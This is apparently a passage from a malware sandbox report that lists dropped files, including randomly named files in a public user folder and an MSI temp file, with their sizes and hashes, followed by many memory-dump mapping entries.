a2e78944fcac34d89385487ccbbfa4d8f078d612

SHA256
696e930706b5d391eb8778f73b0627ffc2be7f6c9a3e7659170d9d37fc4a97b5

SHA512
c9b1ed7b61f26d94d7f5eded2d42d40f3e4300eee2319fe28e04b25cdb6dd92daf67828bff453bf5fc8d7b6ceb58cab319fc0daac9b0050e27a89efe74d2734e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Entities
Filesize
2KB

MD5
ba60431b366f83677a5bf1a2e4601799

SHA1
83f828c27de5429e25c38c36ba77e069d5c7b2de

SHA256
ab895ef5f75efd49dbb4fcdf7529e50ca622d13433e067bcf8a1f1127a944da3

SHA512
aa9ff0374fb3d4bff7ee5a78dd5ace340da4af1a844f453a40b2723a91b32e6e3f4bd736fb3f3cb210b016109660a7b5cc8440901c6bb410e61530286a4e0200

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Fingerprinting
Filesize
110B

MD5
a004023825237dadc8f934758ff9eaf2

SHA1
c981a900b5ce63884635cedfe5ba722416021cb2

SHA256
3c4e82aae615a7bed985b4544afecb774b728df1cc9f7561ea25b97482119ef7

SHA512
e49667fca51a6497ccae9b881d679b857c025f2945ab93c9a6769b1c0a632329993daefab6eda9ed70a32a75630d7b3d93dda5acda8ff87ffe5f090ca7b35e4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Other
Filesize
75B

MD5
c6c7f3ee1e17acbff6ac22aa89b02e4e

SHA1
bdbd0220e54b80b3d2ffbbddadc89bfbb8e64a8b

SHA256
a2f9f27d6938a74979d34484bced535412969c2533dc694bfa667fe81d66d7d4

SHA512
86ed28ffdd00b4a397a20968792fcd30dd4a891a187a7789c00c88b64689b334a11fa087eb54ccee813c181cf891b43184dde7af9a6f33caed2a71e2c445a7b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Social
Filesize
35B

MD5
976b1cf7e3442f88cd8ba26d3f0965bb

SHA1
b75438dc71de4ac761d94a215ddbffadcd1225b0

SHA256
decde67630f29fc003cb1f2ccbd7371a05079985a9cce93ec93c4fadd8dc5541

SHA512
d0472fed72e1eb0a7747a693a0e654fbe92dd028db3cc42377810d90474dd4099ac981cca333eb52c18e75ed04a1f1f79f3bf5957fe8b16086f1252b3454b8d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Staging
Filesize
519B

MD5
9ca5eb41a53645be63d247ad8a9a7869

SHA1
2e98b04b5a2efb04d20bc7fe51b05c4e4841205b

SHA256
f67c58a61ddef715b01debc66ddc0e3c365295ac9870328f6b8bdbcb02a6b8c9

SHA512
7dd7d295ccce957490f025eef124b22c809f140a96003126b801bbbdd94eb2115ee59e7d16dd1f020b1d6eaaff66853b9de2cbf7092c1692f40dbe21ab346fd8

Download Submit
C:\Users\Public\glvt6878zb
Filesize
1KB

MD5
fe4a708f201a02075821a3adfbf46722

SHA1
0043a0976efb85b573fa959f7db59ff3ea751561

SHA256
e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893

SHA512
cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a

Download Submit
C:\Users\Public\glvt6878zb
Filesize
1KB

MD5
fe4a708f201a02075821a3adfbf46722

SHA1
0043a0976efb85b573fa959f7db59ff3ea751561

SHA256
e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893

SHA512
cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a

Download Submit
C:\Users\Public\glvt6878zb
Filesize
1KB

MD5
fe4a708f201a02075821a3adfbf46722

SHA1
0043a0976efb85b573fa959f7db59ff3ea751561

SHA256
e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893

SHA512
cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a

Download Submit
C:\Users\Public\rtuvkf9dn
Filesize
3KB

MD5
9287a7c05440f4fba02ddc00bbc0d2dc

SHA1
d6d4fd6acec6367ab60e52025090c95b03470812

SHA256
27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2

SHA512
522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae

Download Submit
C:\Users\Public\rtuvkf9dn
Filesize
3KB

MD5
9287a7c05440f4fba02ddc00bbc0d2dc

SHA1
d6d4fd6acec6367ab60e52025090c95b03470812

SHA256
27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2

SHA512
522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae

Download Submit
C:\Users\Public\rtuvkf9dn
Filesize
3KB

MD5
9287a7c05440f4fba02ddc00bbc0d2dc

SHA1
d6d4fd6acec6367ab60e52025090c95b03470812

SHA256
27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2

SHA512
522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae

Download Submit
C:\Windows\Installer\MSIBC6A.tmp
Filesize
52KB

MD5
d6959db7ef3dd8a1d7576dc07b58ac20

SHA1
5d61f82d962bca473eb499a97dd8bd2b0c89787d

SHA256
e04d0b1a3abde3e3294736ca90fb39121b7c36015e812fa903e1050dc93a2d6c

SHA512
e0d47ab5b67b0c0e0a5657fedf1827e6ef7e9e81bcc85afd406da1bb84a7f62b383da799f3dd864468c7ed8746731c1984ec281cd3b23396cb34eb61da5fadc1

Download Submit
C:\Windows\Installer\MSIBC6A.tmp
Filesize
52KB

MD5
d6959db7ef3dd8a1d7576dc07b58ac20

SHA1
5d61f82d962bca473eb499a97dd8bd2b0c89787d

SHA256
e04d0b1a3abde3e3294736ca90fb39121b7c36015e812fa903e1050dc93a2d6c

SHA512
e0d47ab5b67b0c0e0a5657fedf1827e6ef7e9e81bcc85afd406da1bb84a7f62b383da799f3dd864468c7ed8746731c1984ec281cd3b23396cb34eb61da5fadc1

Download Submit
\??\pipe\LOCAL\crashpad_4984_CXPOMTVQLYZZIHOA
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/264-180-0x0000000000000000-mapping.dmp

Download
memory/264-205-0x0000000000000000-mapping.dmp

Download
memory/748-131-0x0000000000000000-mapping.dmp

Download
memory/748-141-0x0000019452020000-0x000001945202C000-memory.dmp

Filesize
48KB

Download
memory/756-229-0x0000000000000000-mapping.dmp

Download
memory/764-196-0x0000000000000000-mapping.dmp

Download
memory/800-168-0x0000000000000000-mapping.dmp

Download
memory/868-155-0x0000000000000000-mapping.dmp

Download
memory/928-157-0x0000000000000000-mapping.dmp

Download
memory/1048-181-0x0000000000000000-mapping.dmp

Download
memory/1064-187-0x0000000000000000-mapping.dmp

Download
memory/1076-175-0x0000000000000000-mapping.dmp

Download
memory/1076-159-0x0000000000000000-mapping.dmp

Download
memory/1136-162-0x0000000000000000-mapping.dmp

Download
memory/1404-144-0x0000000000000000-mapping.dmp

Download
memory/1528-152-0x0000000000000000-mapping.dmp

Download
memory/1736-183-0x0000000000000000-mapping.dmp

Download
memory/1808-166-0x0000000000000000-mapping.dmp

Download
memory/1872-148-0x0000000000000000-mapping.dmp

Download
memory/1876-140-0x0000000000000000-mapping.dmp

Download
memory/1896-182-0x0000000000000000-mapping.dmp

Download
memory/2308-169-0x0000000000000000-mapping.dmp

Download
memory/2336-138-0x0000000000000000-mapping.dmp

Download
memory/2340-198-0x0000000000000000-mapping.dmp

Download
memory/2340-188-0x0000000000000000-mapping.dmp

Download
memory/2384-142-0x0000021BA90F0000-0x0000021BA90F3000-memory.dmp

Filesize
12KB

Download
memory/2464-192-0x0000000000000000-mapping.dmp

Download
memory/2464-184-0x0000000000000000-mapping.dmp

Download
memory/2560-190-0x0000000000000000-mapping.dmp

Download
memory/2660-171-0x0000000000000000-mapping.dmp

Download
memory/2820-167-0x0000000000000000-mapping.dmp

Download
memory/3052-139-0x0000000000000000-mapping.dmp

Download
memory/3100-154-0x0000000000000000-mapping.dmp

Download
memory/3276-207-0x0000000000000000-mapping.dmp

Download
memory/3300-130-0x0000000000000000-mapping.dmp

Download
memory/3484-177-0x0000000000000000-mapping.dmp

Download
memory/3736-194-0x0000000000000000-mapping.dmp

Download
memory/3900-165-0x0000000000000000-mapping.dmp

Download
memory/3900-193-0x0000000000000000-mapping.dmp

Download
memory/4008-179-0x0000000000000000-mapping.dmp

Download
memory/4048-200-0x0000000000000000-mapping.dmp

Download
memory/4196-209-0x0000000000000000-mapping.dmp

Download
memory/4216-173-0x0000000000000000-mapping.dmp

Download
memory/4304-185-0x0000000000000000-mapping.dmp

Download
memory/4344-189-0x0000000000000000-mapping.dmp

Download
memory/4388-153-0x0000000000000000-mapping.dmp

Download
memory/4400-149-0x0000000000000000-mapping.dmp

Download
memory/4444-191-0x0000000000000000-mapping.dmp

Download
memory/4520-202-0x0000000000000000-mapping.dmp

Download
memory/4548-186-0x0000000000000000-mapping.dmp

Download
memory/4568-204-0x0000000000000000-mapping.dmp

Download
memory/4812-163-0x0000000000000000-mapping.dmp

Download
memory/4816-146-0x0000000000000000-mapping.dmp

Download
memory/4856-156-0x0000000000000000-mapping.dmp

Download
memory/4908-158-0x0000000000000000-mapping.dmp

Download
memory/4984-145-0x0000000000000000-mapping.dmp

Download